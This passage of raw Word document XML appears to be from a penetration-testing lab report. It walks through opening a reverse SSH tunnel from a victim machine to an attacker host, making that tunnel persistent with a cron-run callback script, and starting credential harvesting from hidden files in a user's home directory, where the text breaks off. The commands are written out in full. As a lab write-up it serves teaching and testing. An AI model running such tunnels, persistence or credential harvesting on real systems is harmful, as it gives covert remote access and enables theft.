                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3884295" cy="2171573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FC2FCB" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4: Verifying SSH Key Authentication from the Victim Machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C26ED7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="219" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7522FDC0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="145"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc30413"/>
      <w:r>
        <w:t xml:space="preserve">9.1.3 Tunneling Through SSH </w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="5A6DB22C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="169"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In diagram 3, it shows how an SSH tunnel is used to securely access a compromised machine. The victim machine is running an SSH service on port 22. From the compromised system, an SSH tunnel is created back to the attacker’s machine, forwarding a remote port (54321) to the victim’s local SSH port (22). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5932E7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="169"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As a result, the attacker can connect to their own localhost on port 54321, which is actually redirected to the victim machine. This allows secure and indirect access to the compromised system through the encrypted SSH tunnel. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2202977E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="78" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2955" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BBABB03" wp14:editId="15A5278D">
            <wp:extent cx="4199128" cy="1903095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1763" name="Picture 1763"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1763" name="Picture 1763"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4199128" cy="1903095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587A92DD" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="209" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagram 3: Forwarding ports through an SSH tunnel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71611D2C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A9089C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC2A9B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBB3F4C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537808EC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB160F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418A0C80" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680E562D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090CE7B9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2262D9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7536F2F9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="392"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 4 shows the output of the command netstat -ant | grep LISTEN, which lists the ports currently listening for connections on the system. The highlighted entry 127.0.0.1:54321 confirms that port 54321 is now open and listening on the local machine. This occurs after the victim machine runs the reverse SSH tunnel command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581439FC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="22" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -N -R 54321:localhost:22 user@10.0.10.199 -i /root/.ssh/pentestkey </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B015862" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The reverse tunnel forwards traffic from port 54321 on the attacker machine to port 22 (SSH) on the victim machine. Seeing port 54321 in the listening state confirms that the reverse SSH tunnel has been successfully created and is ready to accept connections. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA8674B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BEB0E4E" wp14:editId="0390CE7C">
            <wp:extent cx="6070600" cy="3685794"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1808" name="Picture 1808"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1808" name="Picture 1808"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6070600" cy="3685794"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F6ADB" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4: Verifying the Forwarder Port on the Attacking Machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79033FC0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB1B40C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1854D740" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D27025" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924F043" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49223CB7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180146B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 5 shows the attacker successfully connecting to the victim machine through the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C21D6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SSH reverse tunnel. The connection was made using the command ssh piccolo@localhost -p 54321 on the attacker system. Because the reverse tunnel was previously created, traffic sent to port 54321 on the attacker machine is forwarded to port 22 (SSH) on the victim machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CB0E32" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It displays the Ubuntu welcome message and the command prompt piccolo@piccolo, confirming that the attacker has successfully gained SSH access to the victim system through the tunnel. This demonstrates that the reverse SSH tunnel is working correctly and allows remote access to the victim machine even if direct SSH access is restricted. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EC6CE0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4381" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="654E202B" wp14:editId="01350983">
            <wp:extent cx="3295015" cy="3129915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1845" name="Picture 1845"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1845" name="Picture 1845"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3295015" cy="3129915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19CFF9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5: Connecting to the Victim Machine Through the Forwarded SSH Tunnel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C7460" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73195685" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E192FBE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17495694" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B3B56" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F704EB3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc30414"/>
      <w:r>
        <w:t xml:space="preserve">Automating an SSH Tunnel with Cron </w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="5287F7A0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 6 shows the automation of the SSH reverse tunnel using a cron job. A script named /tmp/callback.sh was created and then given execution permissions using the command chmod 700 /tmp/callback.sh.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4533A3B8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The crontab -l command displays the scheduled task configuration. The entry */5 * * * * /tmp/callback.sh means that the script will run every 5 minutes. This script is responsible for reconnecting or maintaining the SSH reverse tunnel automatically. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691CA794" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automating the SSH tunnel with cron ensures that if the connection drops or the system restarts, the script will regularly attempt to re-establish the tunnel without manual intervention. This provides continuous remote access to the system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B55BB86" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1529" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ABA8BAD" wp14:editId="118D68AF">
            <wp:extent cx="5103114" cy="1017905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1893" name="Picture 1893"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1893" name="Picture 1893"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5103114" cy="1017905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7307C696" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6: Creating a Bash Script and Cron Job to Automate the SSH Tunnel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5A7091" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D18C3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 7 shows the SSH tunnel being automatically re-established. The command netstat ant | grep LISTEN confirms that port 54321 is listening on the system. This indicates that the SSH tunnel created earlier is active. A connection is then made using the command ssh piccolo@localhost -p 54321. The login message and the prompt piccolo@piccolo confirm that the connection through the tunnel was successful. Because the tunnel is configured to run through a cron job, it can automatically reconnect if the connection is lost. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CB9927" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="5454" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78F5B1AD" wp14:editId="04AE2B38">
            <wp:extent cx="2614930" cy="2466594"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1895" name="Picture 1895"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1895" name="Picture 1895"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2614930" cy="2466594"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BF3C5E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="209" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7: Automatic Re-establishment of the SSH Tunnel via Cron </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7BBBC3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDF0AF8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc30415"/>
      <w:r>
        <w:t xml:space="preserve">9.2 Harvesting Credentials </w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="0DB4B1ED" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After gaining access to a Linux or UNIX system, one useful place to examine is the user’s home directory. This directory is usually located at /home/username. Inside this directory, there are often files and folders that begin with a dot (.), commonly called dot files or dot directories. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681A7ECD" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These files are normally hidden, so running the standard ls -l command will not display them. To view them, the command ls -la can be used, which lists all files including hidden ones.  When this command is executed from the home directory on the Ubuntu system, several dot files and directories can be seen. Since these files are created and customized by the user, they may contain useful configuration information or other interesting data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7F7708" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="22" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440651B6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 8 shows the contents of the user’s home directory being listed using the command ls -la. The command displays all files and folders, including hidden ones that begin with a dot (.). The directory /home/piccolo/ contains several dot files and directories such as .bash_history, .bashrc, .profile, and .ssh. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41798ADC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
